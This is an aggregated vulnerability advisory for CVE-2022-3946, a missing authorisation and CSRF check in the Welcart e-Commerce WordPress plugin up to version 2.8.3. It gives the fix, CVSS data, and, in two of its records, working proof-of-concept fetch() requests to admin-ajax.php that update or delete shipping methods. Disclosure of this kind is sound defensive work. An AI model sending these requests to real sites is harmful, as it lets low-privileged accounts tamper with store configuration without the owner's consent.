Description
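Authenticated arbitrary shipping method creation/update/deletion vulnerability (CVE-2022-3946) discovered by Lana Codes in the WordPress Welcart e-Commerce plugin (versions <= 2.8.3). An AJAX action in the plugin lacks both an authorisation check and CSRF (nonce) protection, so any logged-in user, including one with only the subscriber role, can create, update and delete shipping methods.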
## Solution
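Update the WordPress Welcart e-Commerce plugin to the latest available version (at least 2.8.4). After updating, review the store's configured shipping methods for entries that were added, changed or removed without an administrator's action, since the flaw allowed any logged-in account to modify them.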
Affected Software
Related
{"id": "PATCHSTACK:A9E63888B975B98FC8011A47D36965DB", "vendorId": null, "type": "patchstack", "bulletinFamily": "software", "title": "WordPress Welcart e-Commerce plugin <= 2.8.3 - Auth. Arbitrary Shipping Method Creation/Update/Deletion vulnerability", "description": "Auth. Arbitrary Shipping Method Creation/Update/Deletion vulnerability discovered by Lana Codes in WordPress Welcart e-Commerce plugin (versions <= 2.8.3).\n\n## Solution\n\n\r\n Update the WordPress Welcart e-Commerce plugin to the latest available version (at least 2.8.4).\r\n ", "published": "2022-11-21T00:00:00", "modified": "2022-11-21T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-8-3-auth-arbitrary-shipping-method-creation-update-deletion-vulnerability", "reporter": "Lana Codes", "references": ["https://wpscan.com/vulnerability/b48e4e1d-e682-4b16-81dc-2feee78d7ed0"], "cvelist": ["CVE-2022-3946"], "immutableFields": [], "lastseen": "2022-11-24T14:39:55", "viewCount": 1, "enchantments": {"score": {"value": 2.8, "vector": "NONE"}, "affected_software": {"major_version": [{"name": "welcart e-commerce", "version": 2}]}, "vulnersScore": 2.8}, "_state": {"score": 1669301307, "dependencies": 1669301316, "affected_software_major_version": 1669305076}, "_internal": {"score_hash": "a304b21b3f251a247d18a6e50aedf2e1"}, "affectedSoftware": [{"version": "2.8.3", "operator": "le", "name": "welcart e-commerce"}], "vendor_cvss": {"score": "3.1", "severity": "Medium severity"}, "owasp": "A5: Broken Access Control", "classification": "Other Vulnerability Type"}
{"wpvulndb": [{"lastseen": "2022-12-15T02:35:31", "description": "The plugin does not have authorisation and CSRF in an AJAX action, allowing any logged-in user to create, update and delete shipping methods.\n\n### PoC\n\nwp_ajax_shop_options_ajax hook calls shop_options_ajax() function without nonce and without access control update shipping method name (#0 shipping method id) exploit: fetch('http://localhost/wp-admin/admin-ajax.php', { method: 'POST', headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded', }), body: 'action=shop_options_ajax&mode;=update_delivery_method&name;=UPDATE&id;=0&time;=&charge;=-1&days;=-1&nocod;=0&intl;=0&cool;_category=0' }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error)); The exploit requires at least a subscriber role. \\--- delete shipping method (#0 shipping method id) exploit: fetch('http://localhost/wp-admin/admin-ajax.php', { method: 'POST', headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded', }), body: 'action=shop_options_ajax&mode;=delete_delivery_method&id;=0' }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error)); The exploit requires at least a subscriber role.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-11-21T00:00:00", "type": "wpvulndb", "title": "Welcart e-Commerce < 2.8.4 - Subscriber+ Arbitrary Shipping Method Creation/Update/Deletion", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-3946"], "modified": "2022-11-21T08:07:50", "id": 
"WPVDB-ID:B48E4E1D-E682-4B16-81DC-2FEEE78D7ED0", "href": "https://wpscan.com/vulnerability/b48e4e1d-e682-4b16-81dc-2feee78d7ed0", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-12-14T23:22:56", "description": "The Welcart e-Commerce WordPress plugin before 2.8.4 does not have authorisation and CSRF in an AJAX action, allowing any logged-in user to create, update and delete shipping methods.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-12-12T18:15:00", "type": "cve", "title": "CVE-2022-3946", "cwe": ["CWE-352", "CWE-862"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-3946"], "modified": "2022-12-14T21:35:00", "cpe": [], "id": "CVE-2022-3946", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-3946", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}], "wpexploit": [{"lastseen": "2022-12-15T02:35:31", "description": "The plugin does not have authorisation and CSRF in an AJAX action, allowing any logged-in user to create, update and delete shipping methods.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-11-21T00:00:00", "type": "wpexploit", "title": "Welcart e-Commerce < 2.8.4 - Subscriber+ Arbitrary Shipping Method 
Creation/Update/Deletion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-3946"], "modified": "2022-11-21T08:07:50", "id": "WPEX-ID:B48E4E1D-E682-4B16-81DC-2FEEE78D7ED0", "href": "", "sourceData": "wp_ajax_shop_options_ajax hook calls shop_options_ajax() function without nonce and without access control\r\n\r\nupdate shipping method name (#0 shipping method id) exploit:\r\n\r\nfetch('http://localhost/wp-admin/admin-ajax.php', {\r\n method: 'POST',\r\n headers: new Headers({\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n }),\r\n body: 'action=shop_options_ajax&mode=update_delivery_method&name=UPDATE&id=0&time=&charge=-1&days=-1&nocod=0&intl=0&cool_category=0'\r\n }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));\r\n\r\nThe exploit requires at least a subscriber role.\r\n\r\n---\r\n\r\ndelete shipping method (#0 shipping method id) exploit:\r\n\r\nfetch('http://localhost/wp-admin/admin-ajax.php', {\r\n method: 'POST',\r\n headers: new Headers({\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n }),\r\n body: 'action=shop_options_ajax&mode=delete_delivery_method&id=0'\r\n }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));\r\n\r\nThe exploit requires at least a subscriber role.", "cvss": {"score": 0.0, "vector": "NONE"}}]}